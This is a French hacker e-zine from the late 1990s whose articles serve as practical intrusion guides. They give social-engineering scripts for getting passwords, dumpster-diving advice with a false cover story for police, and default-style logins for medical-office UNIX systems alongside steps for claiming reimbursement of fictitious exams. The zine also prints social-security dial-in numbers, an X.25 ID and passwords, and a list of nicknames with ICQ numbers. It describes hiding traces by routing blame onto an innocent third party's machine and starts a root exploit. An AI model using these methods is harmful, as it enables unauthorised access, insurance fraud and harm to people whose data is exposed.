Copy Link
Add to Bookmark
Report

Cyber Hacker's Guide 1

eZine's profile picture
Published in 
Cyber Hackers Guide
 · 4 years ago

  

--------------------------------------------------------------------------------------------

C . H . G .

Cyber Hacker's Guide

--------------------------------------------------------------------------------------------

Disclaimer :

Attention :Le contenu de ce mag peut heurter la sensibilité de certaines personnes.Veuillez
attentivement lire ce qui suit, si vous souhaitez continuer la lecture de ce document.

Tout ce qui est contenu sur ce site n'est présent qu'à titre indicatif. Nous vous rappelons
qu'accéder, de façon consciente ou non à un ou des systèmes, ou excéder les droits d'accès
alloués, et par ce comportement, obtenir n'importe quel type d'information est illégal.
Causer l'interruption d'un programme, d'informations, de code, de commandes sur un système
sans autorisation est illégal.

Cyber-Hack ainsi que les autres auteurs de ce mag n'assume absolument aucunes
responsabilités des conséquences que pourrait avoir sur vous ou votre environnement tout ce
qui est présent dans ce zine. Cyber-Hack et tout ce qui s'y rattache ne peut être tenu comme
responsable d'une mauvaise utilisation de ce qui est présenté ici.

Attention, toutes les informations sont fournies "tel quel", la précision ou la justesse
des informations présentes dans ce mag sont sujettes à des conjectures. Aucune garantie
implicite, ou non implicite, et d'aucun type que ce soit n'est assurée par Cyber-Hack ou par
tous ceux qui s'y rattachent de près ou de loin.

Vous utilisez les informations qui sont fournies dans ce mag à vos propres risques!
Cependant nous nous engageons à essayer de fournir le moins d'informations erronées qu'il
nous est possible. Si vous utilisez des sources ou des textes présentés ici, nous vous
demandons que leur origine soit citée.

Tous les personnages mentionnés dans cet e-zine sont purement et simplement fictifs.
Toutes ressemblances avec des personnes, vivantes ou décédées, est purement accidentelle
et n'est le fruit que de la coïncidence.

Finalement :la lecture de ce document est réservé aux seuls membres de l'underground
informatique qui agréant aux points précédents ne font pas partie des catégories suivantes :
employé d'un état, d'une institution et/ou agence gouvernementale, de la police, de l'armée,
de la SEFTI, de la DST, de la DGSE, de la GRC ou de toute organisation affiliée de près ou
de loin aux précédentes ainsi qu'à toutes personne ayant un rapport direct ou indirect
avec un quelconque service similaire.
L'accès a ce texte par ces mêmes personnes ou institutions constituent donc une violation
du copyright car cela revient à lire des informations propriétaires ! (c) constituant ainsi
une atteinte à la vie privée.. A bon entendeur....

L'équipe de Cyber-Hack.


Préface :

"Vanitas Vanitatis = Vanité tout n'est que vanité. Un jour on prend conscience de sa vanité,
de sa duplicité et on tombe de (très) haut : C'est LA CHUTE"
Prisci.

C'est nous tous, membres de l'underground qui sommes encore les seuls qui puissions
combattre tous les Big Brother en puissance qui s'annoncent. Pour cela il n'y a qu'un seul
moyen, nous devons être forts et la plus grande des forces, c'est... la connaissance.. Ce
zine ne me rapportera rien sauf peut être la satisfaction de faire parti des milliers
d'autres sources d'informations qui peuplent aujourd'hui Internet et nous aident à
progresser dans notre art et notre lutte.


"Quelle est la limite l'exès quand commence l'exès ?
Ne plus pouvoir s'arrêter..."
Sylvie.



Bonne lecture!

Brain Override



--------------------------------------------------------------------------------------------

TABLE DES MATIERES

--------------------------------------------------------------------------------------------

I] Les bases du social Engeenering. #Brain Override#
II] Le trashing. #Brain-Rage#
III] Le Réseau de la C.P.A.M. et de la santé en France #Brain Override#
IV] Une petite technique anti-bust. #Brain Override#
V] Note sur le phreaking en france. #Crash Test#
VI] Le livre orange, l'utopie qui nous sert. #Phoenix#
VII] Underground : portrait d'un hacker. #Brain Override#
VIII]Autoreply #Ultrason#
IX] Petit rappel sur les VAX #Brain Override#
X] Cadeau #Brain Override#
XI] Liste des commandes de l'IBM AS/400 #Crash Test#
XII] Les beaux parleurs ! #Brain Override#
XIII] Greets ! #*@*.*#
XIV]Conclusion #Brain Override#


--------------------------------------------------------------------------------------------


I]Les bases du social Engeenering

Cet article était déjà paru dans frhack1, mais c'était la version non corrigée. Le voici
donc, un peu newbie, tel qu'il aurait du paraître il y a quelques mois.

Vous devez vous dire, mais que vient faire du social dans un mag de hack. Eh bien c'est très
simple, la plupart de mes hacks réussis, je les dois à cette méthode. En effet le S.E.
permet de s'attaquer à la plus grosse faille du système de sécurité d'une entreprise: Le
personnel .

Le S.E. est plus simplement l'art du caméléon, celui de l'usurpation de l'identité d'autrui,
afin d'accéder à des information dites condidentielles.

D'abord voici quelques conseils de base :

Préparez une feuille que vous garderez sous les yeux afin de pouvoir rester parfaitement
cohérent, qui mentionne précisément qui vous êtes, votre position dans votre société, etc
et ou vous préparer le synopsis du scénario de votre conversation en essayant de prévoir
les éventuelles questions que votre interlocuteur peut être amené à vous poser, ainsi donc
que quelques réponses prêtes à fournir.

Essayer aussi de prévoir un peu de bruit d'ambiance, style bureau, salle d'informatique etc.
et éventuellement quelques musiques d'attentes que vous balancerez directement dans votre
téléphone. Faites toujours des phrases complètes en employant un vocabulaire très technique,
et surtout beaucoup d'acronymes afin que la personne à l'autre bout du fil se trouve placée
en situation d'infériorité ce qui va lui donner la tendance à accepter comme vrai ce que
vous lui dite.

Vous pouvez essayer de vous faire passer pour :

Un acheteur potentiel
Un client actuel
Un sondage ou une enquête statistique
Un magazine
La radio.. à la limite, la télé il faut vraiment que vous ayez un demeuré au téléphone !
Un technicien telecom, EDF..etc..
La police marche parfois bien aussi.

Ex :

S. Société Datronic, bonjour, Gisèle Dubois.

V. Bonjour, Josée Lespare de Pc-Expert. Je suis chargé d'une enquête visant a l'évaluation
des parcs informatiques dans les entreprises françaises et de leur équipement hard et soft
pour le Laboratoire Ziff-Davis France.

S. Heu..Oui je vais voir si...

V. J'aimerai vous posez quelques questions sur "Les architectures installées" ou bien les
"Os Utilisés" Vous pouvez m'aidez ?

S. Attendez un instant je vais voir si je peux vous passer le Service informatique.

V. Je Je vous remercie vous êtes charmante

S. De rien je vous en prie (Enfin quelqu'un qui lui a dit dans l'année)

Voilà je vous passe Olivier Dotrini, du service informatique.

V. Je vous remercie encore, bonne journée.

S. Olivier Dotrini, bonjour

V. Bonjour, Josée Lespare de Pc-Expert. Je suis chargé d'une enquête visant a l'évaluation
du parc informatique français et de son équipement hard et soft pour le Laboratoire
Ziff-Davis France.

S. Oui que puis je faire pour vous ?

V. Eh bien nous essayons d'évaluer la répartition des OS et des différents matériels dans
les entreprises françaises. C'est pour ca que j'aimerai vous posez quelques questions.


S. (Passons sur la réponse ou notre ami nous décrit en quelques mots plus ou moins long ca
varie du tout ou rien le parc informatique contenant X serveurs etc..etc... a vous de poser
les bonnes questions)

V. Et bien je vous remercie vivement d'avoir répondu à mes questions. Pouvez vous
éventuellement me dire si et quand je pourrai vous recontacter pour de plus amples
informations ?

S. Oui aucun problème Je suis la le Lundi le mardi et le jeudi. sinon vous pouvez demander
Fabrice Boudier qui sera en mesure de vous renseigner.

V. Et bien merci beaucoup et peut être a bientôt.

Au revoir.

In ne vous reste plus qu'à appeler quand Mr Dotrini n'est pas là et demander à parler à Mr
Boudier. Olivier m'a dit que etc.. Sinon il y a une autre méthode qui s'appelle le reverse
Engeenering, la cela consiste en gros à donner une occasion au lamer à l'autre bout du fil
de vous montrer toutes ces compétences en matière de micro-informatique :

Salut c'est Hervé le stagiaire du niveau 2, Je vous appelle parce que j'ai un problème..
Vous vous y connaissez en informatique ? A coup sur la personne sera fière de montrer son
immense savoir ainsi que... sa bêtise !

Continuez ainsi :

Alors voilà, Quand j'allume l'ordinateur, il me demande un login (prononcer LOGAIN, comme ca
vous aurez vraiment l'air stupide, vous épellerez le mot si nécessaire..)
Alors je tape le mot qu'on m'a donné ROSS
Puis après il me demande un password et la je tape l'autre mot qu'on m'a donné HERV01,
et puis là çà marche pas...etc..etc...

Voilà, on pourrait écrire un livre entier sur le SE et ses techniques mais là vous aurez
quelques bases pour appréhender le sujet. N'oubliez pas une autre notion importante, rien
ne remplacera la pratique.

Brain Override


--------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------


II] Le Trashing

Je vais vous parlez dans cette phile du Trashing. Pour moi, c'est une
technique pouvant aussi aider dans l'art du Social Engineering. Le truc consiste en gros
(mais vraiment gros !) a allez fouiller dans les poubelles pour récolter des informations
et on en trouve !
ex: (des login, des Passwd, nø de VMB, PBX, etc...) :)))))))

Alors la première chose à faire est de localiser les poubelles ainsi que le moment où on les
sort. Vous avez le choix.. ou bien vous restez en planque devant la boite, ou bien vous
téléphonez en vous faisant passer pour une société genre hygiène et sécurité et après un
pseudo sondage vous balancez vos question. Encore une chose un truc aussi très efficace
consiste à pogner des informations pendant les visites qu'organisent certaines entreprises.
Là elles ne sont pas méfiantes et c'est facile d'envoyer la main dans une poubelle de bureau
ou bien de regarder quelques écrans...

Bon, alors pour commencer, il nous faut les éléments suivants :

}-Des fringues sales

}-une lampe torche

}-Un sac rempli de cannetes de coca ou autres (meme de la KrO, c'est bon !)

}-Un autre sac pour mettre vos trouvailles...

}- des gants au cas ou y'aurais un maniac qui relève les empreintes digitales..
(oui, oui, je suis parano !)

}-Du cul, Du cul, du cul !

}-Etre vraiment en manque pour faire ce truc de 'ouf...


Bon, maintenant que vous êtes paré(e)s, allez visitez les poubelles
de la sociéte que vous aurez repérée quelques jours avant. Regardez bien aux alentours
s'il n'y a pas des caméras fixées sur les poubelles (et oui, il y a des cons partout !),
si c'est bon, restez sur un banc ou un truc a proximité de la benne pour voir si in n'y a
pas un rambo de la sécurité qui passe avec son klebs. Y'en a un ? Pas de problèmes !
Repérez juste les intervalles auxquelles il passe devant votre benne et assurez vous que son
bureau ne donne pas sur la benne. ( je vous rappelle que c'est tres rare d'avoir affaire a
ce genre de surveillance :)) )

Toutes ces précautions sont prises ? alors plus qu'une chose :

{{{{{-#TrAsHiNg RuLeZ !!!!#-}}}}}

Bon alors vous prenez votre sac plein de cannettes...Eh, vous là ! Pourquoi des canettes ?
Ben parce que si la grand-mere du coin vous a balancé et a appelé les flics, et bien vous
pourrez dire tout simplement que vous aidez une association pour le recyclage des
"emballages en aluminium" (ne dites pas cannnetes), le putain de fonctionnaire ne pourra
rien dire a un mec qui essaye de sauver la planète ! Donc c'est dans la poche ! Il vous dira
que c'est bien et s'il vous prend la tête, abandonnez, revenez plus tard et n'oubliez pas
d'égorger la grand-mère ;-)

Sinon, passons a l'action :

Vous sautez dans la benne comme James Bond, Avec votre lampe, vous eclairez tous les papiers
qui passent...prenez tout ! Les relevés de comptes, les factures, les logs, les codes
sources (si si ! J'ai un jour trouvé des codes sources d'un prog de comtabilité, avec les 2
feuilles décrivant la routine du mot de passe !!!!!).

Prenez tout mais ne remplissez pas votre sac a fond quand même. Jetez un
petit coup d'oeil aux feuilles en regardant le titre en haut pour savoir
de quoi ca parle. Je veux dire, ne prenez pas des trucs du genre "Facture
de 30 Kilos de petit pois poir le resto etc...

Bon, maintenant barrez vous en vitesse par un chemin différent de celui par lequel vous
êtes arrivé, et pensez a ne rien oublier sur place !

Selon les types de poubelles vous pouvez carrément vous barrer avec le où les sacs poubelles
(plus pratique si vous avez une voiture qu'il faudra tout de même nettoyer...) pis aller
dans un coin tranquille et tout dépecer tranquillement...

Voilà c'est tout, arrivé chez vous, vous trierez tout cà et si vous avez de la chance
de trouver des password, ben vous savez quoi faire !!!

Voilà, et si vous vous faites attraper, et que le flic est en manque d'action dans sa vie de
paysan et de lamerZ et qu'il vous emmène au poste parce qu'il a vu "
Demolition Man" hier
soir sur TF1, alors y se sens plus. C'est une fois au poste qu'il faut dire toujours la même
chose (l'histoire des cannetes...) et dire que vous ne connaissez rien en ordinateur
(s'il vous pose la question bien sur, faudrait pas vous trahir !!!!!), que vous ne
connaissez pas Internet, que vous savez a peine vous servir d'un téléphone, pleurez comme
un malade (du style : MAAAAAAAAAAAAMAAAAAAAAANNNNNNNNNN, [snif !],JE VEUX MA
MAMANNNNNNNNNNNNNNN) en fin bon, faut pas exagérer non plus et comme y auront surement
autre chose a faire et ben ils vous relacherons dans l'heure. Sachez de toute manière qu'il
n'est pas interdit en france de fouiller dans les poubelles...

+++Brain-Rage+++


--------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------



III]Le réseau de la C.P.A.M. et de la santé en France.

Sachez tout d'abord chers lecteurs que j'ai longuement hésité à vous fournir ces infos...
La raison est simple : La première est que là, si vous vous faites buster, c'est plutôt
grâve.. En effet, là vous aurez droit directement aux services secrets. Donc vous devez être
EXTREMEMENT PRUDENTS. La seconde raison est le pouvoir sur les autres que vous pouvez
acquérir ainsi.. Changer ce type d'informations sur des individus peut changer leur vie..ou
bien la détruire. Certains aussi vont voir là une nouvelle méthode pour ce faire du blé.
En effet quoi de plus facile que de se faire rembourser des examens fictifs. Surtout en
super-utilisateur.... Vous aurez aussi droit à quelques infos techniques sur Vitale etc..

Pour commencer une petite de liste de UIN à laquelle vous pouvez essayer d'appliquer l'art
du SE... Essayer de vous faire passer pour une secrétaire médicale par ex qui comprend pas.
A vous de voir ;) :

- Al: 5988413
- Ben: 4089804
- Chant: 15169696 (Talala)
- Dide: 3993030
- Gil : 6797035
- Guitou : 2455311 (Cobra)
- Jack: 2557343
- Jay: 15224536
- Jo: 2537339
- K: 5168146
- Mark: 15058851
- Marteloide: 8703100
- Marju: 15056846 (Greedo)
- Mimi: 8630626
- Nad: 6256902 (Naben)
- Phil: 4369465
- Richard: 7797063 (rduputel)
- Rousse: 7733465
- Sabine; 15088525
- Sep: 14960423
- Sky: 7433989
- Titi: 761184 (thlm)
- Vivi: 3019161
- Xav: 2478733

Le plus facile pour commencer, c'est de pénétrer un cabinet médical. Je vous conseille
les cabinets de radiologie, ou encore de scanners... pour vous faire la main. Pour ca
Vous prenez le numéro de teléphone du cabinet que savez au moins informatisé.. Ensuite,
il n'y a généralement qu'un chiffre qui change dans le numéro ex: 04-42-26-08-01
04-42-26-08-02

Après quelques essais, vous aller finir par tomber sur une bécane UNIX. Le système va vous
demander un login et un password.. PAS DE PANIQUE ! :) taper ROOT.. pour le pass, bon aller,
je suis trop gentil, vous allez additioner tous les chiffres de la date, EX:
Pour le 17/12/98, on va avoir : 1+7+1+2+9+8=28 Voilà le pour le PASS. Si ca ne marche pas,
tapez ais à la place du nombre ;)), ensuite tapez tele.
(N.D.R.L.! Ce système est très souvent employé sur de nombreux systèmes, dire que certains
Admins prennent çà, pour une combinaison impénétrable...)

Là vous aller arriver dans le programme. Il s'appelle MODULANCE. Il y a peu d'aide dans le
programme mais tout est assez explicite pour que vous puissiez vous en sortir. Vous pouvez
à loisir vous créer un dossier, des feuilles de soins et même rajouter que ca a été payé ;)
P.S. pour se déloger du prog, 888 F1 et si ca ne marche pas : 131 F1
Je rapelle que pour les radios c'est le cabinet qui se charge d'envoyer ce qu'il faut à la
C.P.A.M, pour que vous soyez remboursés.. De là à se faire rembourser des examens jamais
passés, il n'y a qu'un pas...

Dans ce programme vous pourrez constater qu'il y a des fonctions réservés à la
télétransmission. Une transmission qui se fait donc du cabinet à la C.P.A.M. voire à la
mutuelle. Et tout çà est totalement automatique. Donc si vous faites une télétransmission
et que vous sniffer les échanges. Les pus doués d'entre vous (faudrait pas trop en dire aux
lamers quand même comprendront assez aisément le protocole assez spécifique utilisé.

Vous pouvez aussi repomper le prog et le décompiler. Si je ne dis pas de bétise le source
est peut être avec, sinon, si ca peut vous aider, ca a été programmé en COBOL (Beurk !).
Si vous pompez le prog., pour vous faire passer pour le cabinet (n'oubliez pas quand même,
de vous servir de leur ligne comme relais, ils ne sont pas si cons à la C.P.A.M) il faut
vérifier quelques points pour que la télétransmission fonctionne..

Dans le prog, en 53, pour le type de connection, choississez CPAIX, pour le numéro de tel:
T, le numéro de tel (ex : 04-91-41-81-99) <----oui oui c'est un vrai ..niark ! niark !
ensuite faites un uuinstall faites 4 puis 1, fiche patient, saisi : TCPAM.

Ensuite vérifiez le fichier .profile et si elle y est, enlevez la ligne : HZ=50

Pour la préparation, allez en 266, choississez la norme B2, faites F8, tout saisir, puis
270 pour la télétransmission.

Si vous voulez tester le modem, il faut utiliser kermit :

# /u/bin/kermit
C-Kermit 5A(190), 4 Oct 94, for SCO UNIX/386
Copyright (C) 1985,1994,
Trustees of Columbia University in the City of New York,
Type ? or HELP for help.
C-Kermit>set line /dev/tty2a
C-Kermit>set esc 01
C-Kermit>connect
Connecting to /dev/tty la, speed 9600.
The escape charater is Ctrl-A (ASCII 1 ,SOH)
Type the escape character followed by C to get back,
or followed by ? to see other options.
atz
OK
atdt0votre numéro de portable par ex.
Si le numéro est composé correctement, c'est bon signe.

Mon ami Crash-Test s'agite à coté de moi en trouvant que j'en ai déjà trop dit.
Mais bon je vais encore vous faire quelques petits cadeaux.
Les fichiers télétransmis sont à disposition dans le répertoire /u/rad/fic/cpam/alma288

Pis je vous aide encore, voici quelques numéros directs sur les ordinateur de la sécurité
(où çà ? :)) sociale :
04-91-41-81-99
04-78-24-32-95
03-20-43-36-36 : NUMX25=01011DC3825981; IDDEM=SI38259814200018; MDPAS(ca voudrait pas dire
mot de passe çà ?)=BRDOTEPA ou BRD0TEPA ;
Tiens, voilà du transpac, voilà du transpac...
08-36-06-44-44
08-36-06-24-24
Et même pour les idiots qui ne trouveront pas eux-même, un numéro d'identificateur valide :
38259814200018, sur T0,00836062424

Une dernière chose si çà ne marche pas vous pouvez regarder dans cd /temp et effacez le
fichier QSP et relancez..

Bon cette fois j'en ai assez dit, le reste vous le découvrirez tout seul, sinon vous
n'apprendrez rien ! A peut être que la prochaine fois je vais vous expliquez comment pirater
les réseaux minitel et audiotel en france : ça dirait quelqu'un de laisser son propre message
d'accueil ?

+++Brain Override+++


--------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------


IV]Une petite technique anti-bust.

Cette technique est hyper simple et bien que l'appel reste retraçable, ce n'est pas évident
Vous appelez un PBX, duquel vous en appelez un autre etc... La pluspart d'entre vous savent
déjà utiliser les 080090.... à leur avantage de cette manière. Malheureusement si vous
vraiment un gros coup, on vous retracera quand même donc voivi une petite méthode pour leur
donner du fil à retordre. Personnellement :en utilisant cette méthode + un jammer + du spoof
et une connexion pirate je n'ai encore jamais eu de problèmes...

Vous commencer par vous connecter sur votre 1èr PBX, jusque là pas de prob. Ensuite vous
composez un autre numéro de PBX, vous obtenez de nouveau votre tonalité, et là au lieu de
vous logger sur un 3è, vous refaites le premier numéro.. puis encore le 2è, une dizaine de
fois.
Ce qui donne cune connection de ce type :


Vous--->PBX1------>PBX2-------->PROVIDER
| |
|<---------|

Vous pouvez évidemment compliquer la sauce en rajoutant d'autres PBX. L'avantage de la
technique précédente c'est que s'il veulent vous retracer et qu'ils retombent en boucle sur
les même PBX, il croient que vous les avez roulés...

Personnellement voici la méthode que j'utilise moi, en france et qui a ma fois toujours bien
marché...jusqu'à présent :



Brain Override--->Jammer---->PBX1----->PBX2----->PBX3--->PBX4---->PROVIDER(account pirate)
| 17 fois | |
|<--------| |
|
Cible<-----------SPOOF(X3)<---Daemon<-------SPOOF1<-/-----|
|
|
PIGEON


Pour information, sachez que le premier spoof est un serveur sur lequel j'ai de gros access
et sur lequel je fais tourner un daemon qui surveille tout ce qui est en provenance de la
cible (c'est une sorte de proxy mais adapté précisemment à mes besoins. Le pigeon c'est un
blaireau sur lequel j'ouvre un port à partir du spoof1 et si le Daemon détecte le moindre
paquet suspect qui arrive, il ferme ma connection et redirige tout vers le pigeon. Bon OK
C'est pas cool pour le pigeon mais bon... Au fait après çà ne soyez pas assez stupide pour
recommencer avec le spoof1 qui évidemment sera surveillé. Vous devriez programmer le daemon
pour qu'il s'efface tout seul ainsi que toute trace de votre connection.

Vous pouvez également encore compliquer la sauce en passant par d'autres type de réseaux (
Voir dernier HVU), je n'ai jamais essayé mais ca rajoute une barrière. Avec çà vous pourrez
hacker déjà plus tranquillement....



+++Brain Override+++


--------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------

V] Note sur le phreaking en france

Ah.. ce Brain.. un inconscient.. Si j'étais pas toujours là à lui crier déconnecte, il y a
longtemps qu'il serait au trou ! Je vous le dit. Bon une petite note à nos amis phreakers
français.. (P.S. c'est une fille qui a apprit à Brain, les technique du phreaking..).
Pour ceux qui utilisent une black box, vous savez certainement qu'il est déconseillé de
rester plus d'une demi-heure.. Et les gars réveillez vous ! Actuellement au moment où j'
écris ces lignes, FT est capable de vous repérer en moins de 4 min ! C'est le cas pour
quasiment toutes les rares box qui marchent en France. Idem pour les cabines téléphoniques,
si vous coupez un fil, bip bip bip... On m'a même parlé, je n'ai pas encore vérifié, d'un
appareillage STANDARD qui les alerte si la résistance se trouve un peu trop modifiés.
Alors, phreakez bien... mais faite attention.

P.S. SVP, dite à Brain de pas me taper pour l'histoire de la fille. Ca l'énerve chaque fois
que je lui en reparle..

+++Crash Test+++

--------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------

VI] Le livre orange, l'utopie qui nous sert...

Les systèmes informatiques sont sensés être sécurisés. Le livre orange donne d'ailleurs les
critères auxquels doivent normalement se souscrire tous les systèmes pour disposer d'une
bonne sécurité. Vous comprendrez alors pourquoi il n'existe aucun système qui soit
impénétrable. Il n'existe actuellement aucun système qui puisse souscrire à tous ces
critères. La faille que vous devez trouver... c'est le critère manquant.


Critères de sécurité selon le livre orange

Voici les critères auxquels doivent normalement se souscrire tous les systèmes !

Identification et authentification
Gestion des autorisations d'accès
Contrôle des autorisations d'accès
Contrôle des justifications
Réinitialisation
Garantie de fonctionnalité
Non prise en compte des erreurs
Contrôle des transmissions


Les utilisateurs doivent se déclarer au système au moment de la connexion, prouver leur
qualité d'utilisateur authorisé, s'identifier et s'authentifier.. La procédure de connexion
sous UNIX en est un exemple classique. Il reste cependant possible d'imaginer des systèmes
autres, plus vastes et plus sur, offrant une protection accrue.

Tous les fichiers et objets de la communication inter-processus (par exemple les sémaphores
ou les files d'attente de message) doivent être dotés de droits d'accès. Pour UNIX, c'est le
cas à tous les niveaux. Tous les fichiers et tous les objets de communication
inter-processus contiennent au minimum des autorisations de base en ce qui concerne la
lecture, l'écriture et l'exécution. Il faut également définir individuellement les personnes
aptes à modifier ces droits d'accès et comment cette opération doit se dérouler. Les
possibilités d'UNIX dans ce domaine sont la plupart du temps amplement suffisantes.
Il suffit pourtant de jeter un coup d'oeil sur d'autres systèmes d'exploitation comme Novel
Netware ou VM/VMS pour constater qu'il existe d'autres solutions pour gérer les droits
d'accès.

Dès qu'un utilisateur essaie d'accéder à un fichier ou à un objet de communication
inter-processus, il faut une vérification des droits d'accès. Plus un contrôle est fréquent
et plus le système est censé être sur.

Tous les événements touchant à la sécurité du système doivent faire l'objet d'un
enregistrement, d'un journal. Sous UNIX, il s'agira par exemple des modifications des droits
d'accès (commandes chmod, chown, chgrp) ou l'exécution de programmes dotés du
Set-User-ID-Bit. Pour ces événements est créée une ligne de journal stockée dans un fichier.
Cette procédure est aussi appelée Auditing. Les systèmes UNIX de certification C2 proposent
tous ce système d'audit. Il permet en particulier à l'administrateur de savoir quel
utilisateur a utilisé quel fichier.

La réinitialisation est la capacité d'un système à mettre à disposition des moyens de
travail 'des blocs de données du disque dur ou des pages de la mémoire) sans que personne
ne puisse en tirer des conclusions quant à leur emploi précédent. Un bloc de données du
disque dur doit donc être vidé de toutes les informations qu'il contenait précédemment,
avant d'être réutilisé par un autre processus. De base n'était remplie que très
partiellement dans les anciens systèmes UNIX.

Que fait le système si des erreurs surviennent dans tous les domaines ? Il peut par exemple
en arriver que le noyau du système d'exploitation ne trouve plus de porte de sortie correcte
à la situation d'erreur. Dans ce cas apparaît sur la console un message avec le terme peu
optimiste de PANIC. Et si vraiment la situation est terrible, vous verrez peut-être même un
jour le terme DOUBLE PANIC (mais nous ne vous le souhaitons pas). Avec un système dit sur,
la correction de l'erreur doit être possible sans que la sécurité de l'ensemble du système
ne soit mis en cause.

La question de la garantie des fonctionnalités concerne les tâches que le système doit
encore être en mesure de réaliser même si des erreurs surviennent dans certains domaines.
Que se passe-t-il si, par exemple, un terminal déclare forfait ou si une carte réseau pose
problème ? Est-ce que l'ensemble du système en subira les conséquences ?

Dès qu'on essaie de transférer des données d'un système sur un autre, ce ne sont plus tant
les droits d'accès qui sont en cause, qu'il s'agisse de leur vérification ou de leur
gestion. Pour ces opérations particulières interviennent d'autres fonctions de sécurité.
Pour ces contrôles des transmissions, il est demandé à ca que le système contrôle
sérieusement l'identité du partenaire de la communication et qu'il vérifie que les données
aient bien été lues et traitées. Il est bien évidemment interdit à quiconque d'extérieur
d'interrompre cette communication, d'intervenir ou encore de participer à l'opération.

Selon la classification IT les critères de sécurité sont classés de F1 à F5, cas catégories
reprenant dans les grandes lignes les distinctions faites dans l'Orange Book. Cette
classification est complété par les catégories F6 ) F10, s'appliquant plus spécialement
aux systèmes de base de données et aux réseaux publics. Cette classification de systèmes
d'après les critères de sécurité est complétée par des classes de qualité, s'échelonnant
de Q0 ) Q7 et portant plus spécifiquement sur la qualité des mécanisme de sécurité.

Ainsi un système informatique bénéficie toujours d'une double classification, sécurité et
qualité.

Vous pourrez bientôt trouver le vrai "
orange book" complet sur notre site et j'envisage d'
ailleurs de le traduire. Si le job interesse quelqu'un....


+++Phoenix+++

--------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------


VII] Underground : portrait d'un hacker.

Vous avez surement lu sur le web des centaines de textes qui donne le portrait du hacker
"
type". Et bien ce ne sont que des foutaises. S'il est vrai que nous sommes tous liés par
une passion et parfois des objectifs communs, nous sommes pourtant tous bien différents.
Là c'est de moi que je vais parler. Je me fou de ce que vous en penserez, ceci est mon
histoire, elle n'a rien d'extraordinaire, la pluspart ne se reconnaîtront pas dans ce
portrait, vous comprendrez alors que chacun d'entre vous dispose de quelque chose que l'
autre n'aura jamais. Voilà pourquoi vous ne valez pas forcemment moins qu'un autre...

Tout à commencé pour moi à 8 ans. Les jeux des autres enfants et leurs plaisanteries idiotes
m'atterre. Aujourd'hui c'est le réveillon de Noël, il est approximativement 18H00, à Auchan
ils ont fait une erreur de commande, des milliers de M.S.X. commandés au lieu d'une
centaine. Ils faut se débarrasser des bécanes, on solde à 500 Francs.... Ma mère se jette
sur l'occasion... pour 500 Francs ca sera jamais perdu.... Je branche la bécane sur le
moniteur qu'ils m'ont acheté avec, chic l'écran s'allume, c'est écris O.K. en blanc sur fond
bleu et il y a 5 mots écris en bas.. A quoi ca sert ?

24 Heures après, je n'ai toujours pas dormi, comme je n'arrivais pas à faire marcher le jeu
qui allait avec, j'ai programmé un morpion.. et ça marche cool ! La bécane fait ce qu'on lui
dit et en plus elle ne mort pas... En face de chez moi habite un ingénieur de chez Thomson
Electronic, un jour, il déménage.. je passe à coté de la poubelle il y a plein de trucs
dedans plein de cartes électronique et plein de bouquins.. sur certains il y a même écrit :
"
confidentiel" Dans toute cette paperasse il y a une drôle de carte isolée sous un sachet
antistatique, avec il y a un livret : "
comment fabriquer un "modulateur/démodulateur"...
Bah on lit un peu et on essaye.. avec le schéma fournit du port série du MSX et le schéma
sur la doc, on voit qu'il y a des correspondances.. bon ok on essaye. Avec un petit
programme basic en envoie des informations au nouveau joujou.. y a des LED qui s'allument
dessus.. c'est cool... y un autre livre.. c'est écrit le réseau TRANSPAC.. on continue de
lire un peu et là c'est parti pour de bon, encore plus fort que l'adrénaline, propulsé dans
le monde des réseaux et du microprocesseur... C'est cool je n'ai pas la seule bécane au
monde.. il y en a d'autre et on peut leur parler avec le téléphone..

Mince certaines ne veulent pas parler.. elle demande un login et un mot de passe..un peu
plus de doc, sur TRANSPAC et sur les BBS, on essait quelques trucs.. et ca marche, en plus
dessus on trouve plein de progs... Oups c'est la fin du moi la facture de téléphone est
trop grosse.. il faut faire quelque chose.. Tiens on peut aussi parler aux bécanes de FT,
la facturation est accessible assez simplement : erreur FT---> remboursement, ouf on a eu
chaud, mais ça a l'air dangereux, il faut trouver autre chose. Je n'ai que 11 ans à ce
moment là mais j'ai refourgué quelques progs à un gars qui connaît quelqu'un chez FT il me
donne un truc : combinaison + 1 + mon numéro + numéro à appeler et miracle 0 F /min ... Le
temps passe ca marche plus... J'ai acheté un sans fil au marché aux puces.. hum il y a de
la tension dans un des câbles qui arrive à la prise téléphonique.. ca doit être pareil au
poteau.. Et Hop ! La base en haut d'un poteau téléphonique à 50 m de la maison.. chic, le
modem acoustique, il marche...

Un jour je joue un peu trop avec une bécane, depuis, j'ai eu un P.C., La gendarmerie
arrivera quand même jusqu'au poteau téléphonique... Cette fois on à eu chaud... on arrête..
Mais non je en peux pas la tentation est trop forte.. on y retourne.A la télé vous avez
parlez de moi... un CRIMINEL informatique... véritable terroriste des temps modernes à
encore frappé... terroriste...criminel ?? hum il doit y avoir une erreur quelque part....
Je n'ai jamais tué personne... Vous vous dites justicier quand vous nous arrêtez, mais
savez vous vraiment qui nous sommes ?? Chez nous il n'y à pas de dogme ni de préjugé.
Chez nous les valeurs existent encore, on juge les gens pour ce qu'ils sont vraiment pas
sur leurs apparences. Il n'y a que dans notre monde, sur le septième continent qu'est
Internet, qu'existe la liberté totale d'expression et de communication.. C'est vous qui
construisez des armes de plus en plus destructrices qui renversez des gouvernements ou
affamez les peuples et vous osez nous appeler des criminels.. Des crimes nous ? Nous n'en
avons commit qu'un seul.. C'est le crime de la curiosité, et celui de vous être toujours
supérieur... Un crime en effet impardonnable à vos yeux d'avoir été doté d'une intelligence
et d'une soif de connaissance que vous n'aurez jamais....

+++Brain Override+++

"La violence est le dernier refuge de l'incompétence..." Isaac Asimov

"La connaissance est la plus grand des pouvoirs,
Le savoir la plus grande des puissances"


+++Brain Override+++


-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------


VIII] Le bug Autoreply

Ce truc est assez vieux, mais je trouve tous les jours encore des systèmes où çà marche...
donc :
A priori cela marche sur tous les systèmes qui disposent d'une installation standard de :
Elm Mail System. Autoreply peut, en autre, être utilisé pour créer des fichiers root avec
le mode 666. L'exemple qui suit, permet de devenir super-utilisateur en modifiant le
fichier .rhosts ; Créez le script suivant que vous nommerez fixrhosts :

#!/bin/sh
#
